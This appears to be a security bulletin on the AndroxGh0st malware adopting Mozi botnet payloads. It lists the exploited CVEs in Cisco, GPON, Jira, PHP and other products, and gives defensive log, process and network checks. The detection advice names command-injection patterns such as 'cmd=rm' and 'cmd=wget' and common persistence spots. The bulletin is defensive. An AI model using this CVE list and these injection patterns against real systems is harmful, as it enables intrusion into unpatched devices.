Summary:
AndroxGh0st, a Python-based cloud attack tool that's known for its targeting of Laravel applications with the goal of sensitive data pertaining to services like Amazon Web Services, is being utilized in a campaign exploiting a larger set of security flaws only impacting internet-facing applications. The Mozi botnet utilizes remote code execution and credential-stealing methods to maintain persistent access, leveraging unpatched vulnerabilities to infiltrate critical infrastructures. Since January 2024, Androxgh0st has adopted payloads and tactics from Mozi, allowing it to target systems like Cisco ASA, Atlassian JIRA, and PHP frameworks. Observed actively conducting operations since 2022, AndroxGh0st has leveraged flaws in the Apache web server (CVE-2021-41773), Laravel Framework (CVE-2018-15133), and PHPUnit (CVE-2017-9841) to gain initial access, escalate privileges, and establish persistent control over compromised systems. In March 2024, U.S. cybersecurity and intelligence agencies unveiled that attackers are utilizing AndroxGh0st malware to create a botnet for victim identification and exploitation in target networks. Analysis from CloudSEK indicates the malware now leverages these vulnerabilities to gain initial access:

• CVE-2014-2120 (CVSS score: 4.3) - Cisco ASA WebVPN login page XSS vulnerability
• CVE-2018-10561 (CVSS score: 9.8) - Dasan GPON authentication bypass vulnerability
• CVE-2018-10562 (CVSS score: 9.8) - Dasan GPON command injection vulnerability
• CVE-2021-26086 (CVSS score: 5.3) - Atlassian Jira path traversal vulnerability
• CVE-2021-41277 (CVSS score: 7.5) - Metabase GeoJSON map local file inclusion vulnerability
• CVE-2022-1040 (CVSS score: 9.8) - Sophos Firewall authentication bypass vulnerability
• CVE-2022-21587 (CVSS score: 9.8) - Oracle E-Business Suite (EBS) Unauthenticated arbitrary file upload vulnerability
• CVE-2023-1389 (CVSS score: 8.8) - TP-Link Archer AX21 firmware command injection vulnerability
• CVE-2024-4577 (CVSS score: 9.8) - PHP CGI argument injection vulnerability
• CVE-2024-36401 (CVSS score: 9.8) - GeoServer remote code execution vulnerability

Mozi botnet, whose authors were arrested by Chinese government in September 2021, was known for its DDoS attacks and a kill switch command wasn’t issued to the botnet until August 2023. Threat actos utilizing AndroxGh0st and Mozi are not just sharing resources, but combining functionality to perform new operations.

Security Officer Comments:
The resurfacing of Mozi botnet highlighted by US intelligence agencies marks the strategic expansion and integration of elements from two kinds of malware. CloudSEK recommends immediate patching of these vulnerabilities to mitigate risks associated with the Androxgh0st botnet, which is known for systematic exploitation and persistent backdoor access. If AndroxGh0st is teaming up and consolidating, that would mean AndroxGh0st has expanded to leverage Mozi's propagation power to infect more IoT devices, using Mozi's payloads to accomplish goals that otherwise would require separate infection routines. Due to evidence that the two kinds of malware share the same command infrastructure, it can be inferred that both are controlled by the same threat group, potentially with the goal of streamlining their infection chains and enhancing the effectiveness of both botnets.

Suggested Corrections:
IOCs for this activity are available here.

• Review HTTP and Web Server Logs
  • Check for Suspicious Requests: Look for HTTP GET or POST requests that include unusual or suspicious commands, such as wget, curl, or command injection parameters like cmd=rm or cmd=wget. These are common signs of attempted command injection by Androxgh0st.
  • Check for Unusual Login Attempts: Look for repeated failed login attempts, indicating brute-force activity on login pages such as /wp-login.php, /admin_login, or /cgi-bin/login.cgi. These may target default credentials or weak passwords.
• Monitor System Processes for Unexpected Activity
  • Identify Suspicious Processes: Use commands like ps aux or top to look for unexpected processes running from unusual locations (e.g., /tmp, /var/tmp, or /dev/shm), which is typical of botnet payloads.
  • Inspect Crontab Entries and Startup Scripts: Androxgh0st often attempts persistence by modifying crontab files or startup scripts. Use the following commands to check for any suspicious entries:crontab -l
• Examine Suspicious Files in Temporary Directories
  • Inspect /tmp, /var/tmp, and /dev/shm Directories: Androxgh0st payloads and scripts are often downloaded and executed from these directories. Look for files with unusual names or recent changes in these locations:ls -la /tmp
  • ls -la /var/tmp
  • Check File Permissions and Executable Files: Files in these directories should not typically be executable. Use find to locate executable files in these directories:find /tmp -type f -perm /111
• Analyze Network Connections and Traffic
  • Monitor Outbound Connections to Known Malicious IPs or Domains: Androxgh0st may establish connections to its command-and-control (C2) server. Use tools like netstat or ss to identify active network connections:netstat -antp | grep ESTABLISHED
  • Look for unusual outbound connections on uncommon ports (e.g., high-numbered ports) or to external IPs that you don’t recognize.
  • Check for Excessive or Unusual Traffic Patterns:Androxgh0st-infected devices may exhibit unusual traffic, particularly if they are participating in a botnet. Monitor traffic for signs of:some text
    • Repeated DNS lookups for suspicious domains.
    • High volumes of outbound traffic that may indicate participation in DDoS activities.
• Review Security Configurations for Changes
  • Check for Unexpected Changes to Firewall and Router Settings: Androxgh0st may attempt to open additional ports or modify firewall rules. Review firewall rules and router settings for unexpected modifications.
  • Inspect SSH Configuration for Weaknesses or Unauthorized Keys: If Androxgh0st used SSH brute-forcing to gain access, verify that no new SSH keys have been added to ~/.ssh/authorized_keys.
• Scan for Known Vulnerabilities and Apply Patches
  • Identify Vulnerable Services and Applications: Androxgh0st often exploits known vulnerabilities in web servers, routers, and IoT devices. Use continuous attack surface scanners to detect any unpatched services or applications.
  • Update Firmware and Software Regularly: Ensure that all devices, particularly IoT devices and routers, are running the latest firmware versions, as Androxgh0st targets unpatched CVEs.
• Use Endpoint Detection Tools
  • Run Endpoint Detection and Response (EDR) Software: EDR tools can help identify unusual behaviors, unauthorized processes, and suspicious files that may indicate Androxgh0st infection.
  • Conduct a File Integrity Check: Use tools that can detect changes to critical system files, startup configurations, or web server files.
• Check Logs for Signs of Persistence Mechanisms
  • Look for Modified Configuration Files: Review configuration files for any injected commands that would re-enable the botnet upon reboot. This includes files such as /etc/rc.local, .bashrc, or any custom startup scripts.
  • Audit System Logs for Malicious Activity Patterns: Look for patterns in auth.log, syslog, or application logs that may indicate Androxgh0st’s activity, including unexpected root login attempts or commands executed by web server user accounts.

Link(s):
https://thehackernews.com/2024/11/androxgh0st-malware-integrates-mozi.html

https://www.cloudsek.com/blog/mozi-resurfaces-as-androxgh0st-botnet-unraveling-the-latest-exploitation-wave